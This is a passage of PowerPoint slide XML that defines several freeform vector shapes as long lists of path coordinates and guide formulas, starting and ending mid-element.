                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="53"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="315" y="315"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="315" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="315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6" name="Freeform 79"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3165475" y="5565775"/>
                <a:ext cx="228600" cy="279400"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 447 w 636"/>
                  <a:gd name="T1" fmla="*/ 268 h 778"/>
                  <a:gd name="T2" fmla="*/ 452 w 636"/>
                  <a:gd name="T3" fmla="*/ 273 h 778"/>
                  <a:gd name="T4" fmla="*/ 520 w 636"/>
                  <a:gd name="T5" fmla="*/ 268 h 778"/>
                  <a:gd name="T6" fmla="*/ 551 w 636"/>
                  <a:gd name="T7" fmla="*/ 284 h 778"/>
                  <a:gd name="T8" fmla="*/ 583 w 636"/>
                  <a:gd name="T9" fmla="*/ 305 h 778"/>
                  <a:gd name="T10" fmla="*/ 630 w 636"/>
                  <a:gd name="T11" fmla="*/ 368 h 778"/>
                  <a:gd name="T12" fmla="*/ 635 w 636"/>
                  <a:gd name="T13" fmla="*/ 442 h 778"/>
                  <a:gd name="T14" fmla="*/ 620 w 636"/>
                  <a:gd name="T15" fmla="*/ 483 h 778"/>
                  <a:gd name="T16" fmla="*/ 557 w 636"/>
                  <a:gd name="T17" fmla="*/ 583 h 778"/>
                  <a:gd name="T18" fmla="*/ 510 w 636"/>
                  <a:gd name="T19" fmla="*/ 636 h 778"/>
                  <a:gd name="T20" fmla="*/ 415 w 636"/>
                  <a:gd name="T21" fmla="*/ 730 h 778"/>
                  <a:gd name="T22" fmla="*/ 331 w 636"/>
                  <a:gd name="T23" fmla="*/ 772 h 778"/>
                  <a:gd name="T24" fmla="*/ 294 w 636"/>
                  <a:gd name="T25" fmla="*/ 777 h 778"/>
                  <a:gd name="T26" fmla="*/ 221 w 636"/>
                  <a:gd name="T27" fmla="*/ 762 h 778"/>
                  <a:gd name="T28" fmla="*/ 189 w 636"/>
                  <a:gd name="T29" fmla="*/ 736 h 778"/>
                  <a:gd name="T30" fmla="*/ 147 w 636"/>
                  <a:gd name="T31" fmla="*/ 672 h 778"/>
                  <a:gd name="T32" fmla="*/ 137 w 636"/>
                  <a:gd name="T33" fmla="*/ 641 h 778"/>
                  <a:gd name="T34" fmla="*/ 142 w 636"/>
                  <a:gd name="T35" fmla="*/ 599 h 778"/>
                  <a:gd name="T36" fmla="*/ 0 w 636"/>
                  <a:gd name="T37" fmla="*/ 546 h 778"/>
                  <a:gd name="T38" fmla="*/ 609 w 636"/>
                  <a:gd name="T39" fmla="*/ 95 h 778"/>
                  <a:gd name="T40" fmla="*/ 210 w 636"/>
                  <a:gd name="T41" fmla="*/ 552 h 778"/>
                  <a:gd name="T42" fmla="*/ 205 w 636"/>
                  <a:gd name="T43" fmla="*/ 589 h 778"/>
                  <a:gd name="T44" fmla="*/ 226 w 636"/>
                  <a:gd name="T45" fmla="*/ 625 h 778"/>
                  <a:gd name="T46" fmla="*/ 242 w 636"/>
                  <a:gd name="T47" fmla="*/ 636 h 778"/>
                  <a:gd name="T48" fmla="*/ 284 w 636"/>
                  <a:gd name="T49" fmla="*/ 641 h 778"/>
                  <a:gd name="T50" fmla="*/ 305 w 636"/>
                  <a:gd name="T51" fmla="*/ 630 h 778"/>
                  <a:gd name="T52" fmla="*/ 404 w 636"/>
                  <a:gd name="T53" fmla="*/ 541 h 778"/>
                  <a:gd name="T54" fmla="*/ 457 w 636"/>
                  <a:gd name="T55" fmla="*/ 478 h 778"/>
                  <a:gd name="T56" fmla="*/ 488 w 636"/>
                  <a:gd name="T57" fmla="*/ 431 h 778"/>
                  <a:gd name="T58" fmla="*/ 494 w 636"/>
                  <a:gd name="T59" fmla="*/ 389 h 778"/>
                  <a:gd name="T60" fmla="*/ 473 w 636"/>
                  <a:gd name="T61" fmla="*/ 352 h 778"/>
                  <a:gd name="T62" fmla="*/ 457 w 636"/>
                  <a:gd name="T63" fmla="*/ 342 h 778"/>
                  <a:gd name="T64" fmla="*/ 420 w 636"/>
                  <a:gd name="T65" fmla="*/ 336 h 778"/>
                  <a:gd name="T66" fmla="*/ 399 w 636"/>
                  <a:gd name="T67" fmla="*/ 347 h 778"/>
                  <a:gd name="T68" fmla="*/ 294 w 636"/>
                  <a:gd name="T69" fmla="*/ 436 h 778"/>
                  <a:gd name="T70" fmla="*/ 242 w 636"/>
                  <a:gd name="T71" fmla="*/ 499 h 7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36" h="778">
                    <a:moveTo>
                      <a:pt x="609" y="95"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="777"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="777"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="762"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="95"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="210" y="552"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="210" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="552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7" name="Freeform 80"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3314700" y="5688013"/>
                <a:ext cx="212725" cy="242887"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 462 w 589"/>
                  <a:gd name="T1" fmla="*/ 236 h 673"/>
                  <a:gd name="T2" fmla="*/ 110 w 589"/>
                  <a:gd name="T3" fmla="*/ 672 h 673"/>
                  <a:gd name="T4" fmla="*/ 0 w 589"/>
                  <a:gd name="T5" fmla="*/ 577 h 673"/>
                  <a:gd name="T6" fmla="*/ 352 w 589"/>
                  <a:gd name="T7" fmla="*/ 147 h 673"/>
                  <a:gd name="T8" fmla="*/ 462 w 589"/>
                  <a:gd name="T9" fmla="*/ 236 h 673"/>
                  <a:gd name="T10" fmla="*/ 588 w 589"/>
                  <a:gd name="T11" fmla="*/ 89 h 673"/>
                  <a:gd name="T12" fmla="*/ 509 w 589"/>
                  <a:gd name="T13" fmla="*/ 184 h 673"/>
                  <a:gd name="T14" fmla="*/ 399 w 589"/>
                  <a:gd name="T15" fmla="*/ 95 h 673"/>
                  <a:gd name="T16" fmla="*/ 473 w 589"/>
                  <a:gd name="T17" fmla="*/ 0 h 673"/>
                  <a:gd name="T18" fmla="*/ 588 w 589"/>
                  <a:gd name="T19" fmla="*/ 89 h 6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89" h="673">
                    <a:moveTo>
                      <a:pt x="462" y="236"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="236"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="588" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="509" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="89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8" name="Freeform 81"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3387725" y="5743575"/>
                <a:ext cx="204788" cy="244475"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 567 w 568"/>
                  <a:gd name="T1" fmla="*/ 89 h 678"/>
                  <a:gd name="T2" fmla="*/ 115 w 568"/>
                  <a:gd name="T3" fmla="*/ 677 h 678"/>
                  <a:gd name="T4" fmla="*/ 0 w 568"/>
                  <a:gd name="T5" fmla="*/ 593 h 678"/>
                  <a:gd name="T6" fmla="*/ 451 w 568"/>
                  <a:gd name="T7" fmla="*/ 0 h 678"/>
                  <a:gd name="T8" fmla="*/ 567 w 568"/>
                  <a:gd name="T9" fmla="*/ 89 h 6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8" h="678">
                    <a:moveTo>
                      <a:pt x="567" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="115" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="89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9" name="Freeform 82"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3465513" y="5792788"/>
                <a:ext cx="198437" cy="252412"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 441 w 552"/>
                  <a:gd name="T1" fmla="*/ 242 h 699"/>
                  <a:gd name="T2" fmla="*/ 116 w 552"/>
                  <a:gd name="T3" fmla="*/ 698 h 699"/>
                  <a:gd name="T4" fmla="*/ 0 w 552"/>
                  <a:gd name="T5" fmla="*/ 614 h 699"/>
                  <a:gd name="T6" fmla="*/ 325 w 552"/>
                  <a:gd name="T7" fmla="*/ 158 h 699"/>
                  <a:gd name="T8" fmla="*/ 441 w 552"/>
                  <a:gd name="T9" fmla="*/ 242 h 699"/>
                  <a:gd name="T10" fmla="*/ 551 w 552"/>
                  <a:gd name="T11" fmla="*/ 84 h 699"/>
                  <a:gd name="T12" fmla="*/ 483 w 552"/>
                  <a:gd name="T13" fmla="*/ 184 h 699"/>
                  <a:gd name="T14" fmla="*/ 362 w 552"/>
                  <a:gd name="T15" fmla="*/ 100 h 699"/>
                  <a:gd name="T16" fmla="*/ 436 w 552"/>
                  <a:gd name="T17" fmla="*/ 0 h 699"/>
                  <a:gd name="T18" fmla="*/ 551 w 552"/>
                  <a:gd name="T19" fmla="*/ 84 h 6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52" h="699">
                    <a:moveTo>
                      <a:pt x="441" y="242"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="116" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="242"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="551" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="483" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="84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0" name="Freeform 83"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3565525" y="5857875"/>
                <a:ext cx="173038" cy="263525"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 478 w 479"/>
                  <a:gd name="T1" fmla="*/ 78 h 730"/>
                  <a:gd name="T2" fmla="*/ 389 w 479"/>
                  <a:gd name="T3" fmla="*/ 215 h 730"/>
                  <a:gd name="T4" fmla="*/ 462 w 479"/>
                  <a:gd name="T5" fmla="*/ 257 h 730"/>
                  <a:gd name="T6" fmla="*/ 410 w 479"/>
                  <a:gd name="T7" fmla="*/ 341 h 730"/>
                  <a:gd name="T8" fmla="*/ 336 w 479"/>
                  <a:gd name="T9" fmla="*/ 294 h 730"/>
                  <a:gd name="T10" fmla="*/ 173 w 479"/>
                  <a:gd name="T11" fmla="*/ 551 h 730"/>
                  <a:gd name="T12" fmla="*/ 173 w 479"/>
                  <a:gd name="T13" fmla="*/ 551 h 730"/>
                  <a:gd name="T14" fmla="*/ 158 w 479"/>
                  <a:gd name="T15" fmla="*/ 577 h 730"/>
                  <a:gd name="T16" fmla="*/ 158 w 479"/>
                  <a:gd name="T17" fmla="*/ 593 h 730"/>
                  <a:gd name="T18" fmla="*/ 158 w 479"/>
                  <a:gd name="T19" fmla="*/ 593 h 730"/>
                  <a:gd name="T20" fmla="*/ 163 w 479"/>
                  <a:gd name="T21" fmla="*/ 614 h 730"/>
                  <a:gd name="T22" fmla="*/ 184 w 479"/>
                  <a:gd name="T23" fmla="*/ 630 h 730"/>
                  <a:gd name="T24" fmla="*/ 184 w 479"/>
                  <a:gd name="T25" fmla="*/ 630 h 730"/>
                  <a:gd name="T26" fmla="*/ 194 w 479"/>
                  <a:gd name="T27" fmla="*/ 635 h 730"/>
                  <a:gd name="T28" fmla="*/ 194 w 479"/>
                  <a:gd name="T29" fmla="*/ 635 h 730"/>
                  <a:gd name="T30" fmla="*/ 210 w 479"/>
                  <a:gd name="T31" fmla="*/ 645 h 730"/>
                  <a:gd name="T32" fmla="*/ 158 w 479"/>
                  <a:gd name="T33" fmla="*/ 729 h 730"/>
                  <a:gd name="T34" fmla="*/ 158 w 479"/>
                  <a:gd name="T35" fmla="*/ 729 h 730"/>
                  <a:gd name="T36" fmla="*/ 116 w 479"/>
                  <a:gd name="T37" fmla="*/ 703 h 730"/>
                  <a:gd name="T38" fmla="*/ 116 w 479"/>
                  <a:gd name="T39" fmla="*/ 703 h 730"/>
                  <a:gd name="T40" fmla="*/ 74 w 479"/>
                  <a:gd name="T41" fmla="*/ 682 h 730"/>
                  <a:gd name="T42" fmla="*/ 74 w 479"/>
                  <a:gd name="T43" fmla="*/ 682 h 730"/>
                  <a:gd name="T44" fmla="*/ 42 w 479"/>
                  <a:gd name="T45" fmla="*/ 656 h 730"/>
                  <a:gd name="T46" fmla="*/ 21 w 479"/>
                  <a:gd name="T47" fmla="*/ 640 h 730"/>
                  <a:gd name="T48" fmla="*/ 21 w 479"/>
                  <a:gd name="T49" fmla="*/ 640 h 730"/>
                  <a:gd name="T50" fmla="*/ 6 w 479"/>
                  <a:gd name="T51" fmla="*/ 619 h 730"/>
                  <a:gd name="T52" fmla="*/ 0 w 479"/>
                  <a:gd name="T53" fmla="*/ 598 h 730"/>
                  <a:gd name="T54" fmla="*/ 0 w 479"/>
                  <a:gd name="T55" fmla="*/ 598 h 730"/>
                  <a:gd name="T56" fmla="*/ 0 w 479"/>
                  <a:gd name="T57" fmla="*/ 572 h 730"/>
                  <a:gd name="T58" fmla="*/ 11 w 479"/>
                  <a:gd name="T59" fmla="*/ 545 h 730"/>
                  <a:gd name="T60" fmla="*/ 11 w 479"/>
                  <a:gd name="T61" fmla="*/ 545 h 730"/>
                  <a:gd name="T62" fmla="*/ 42 w 479"/>
                  <a:gd name="T63" fmla="*/ 488 h 730"/>
                  <a:gd name="T64" fmla="*/ 216 w 479"/>
                  <a:gd name="T65" fmla="*/ 215 h 730"/>
                  <a:gd name="T66" fmla="*/ 158 w 479"/>
                  <a:gd name="T67" fmla="*/ 178 h 730"/>
                  <a:gd name="T68" fmla="*/ 210 w 479"/>
                  <a:gd name="T69" fmla="*/ 94 h 730"/>
                  <a:gd name="T70" fmla="*/ 273 w 479"/>
                  <a:gd name="T71" fmla="*/ 136 h 730"/>
                  <a:gd name="T72" fmla="*/ 357 w 479"/>
                  <a:gd name="T73" fmla="*/ 0 h 730"/>
                  <a:gd name="T74" fmla="*/ 478 w 479"/>
                  <a:gd name="T75" fmla="*/ 78 h 7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79" h="730">
                    <a:moveTo>
                      <a:pt x="478" y="78"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="389" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
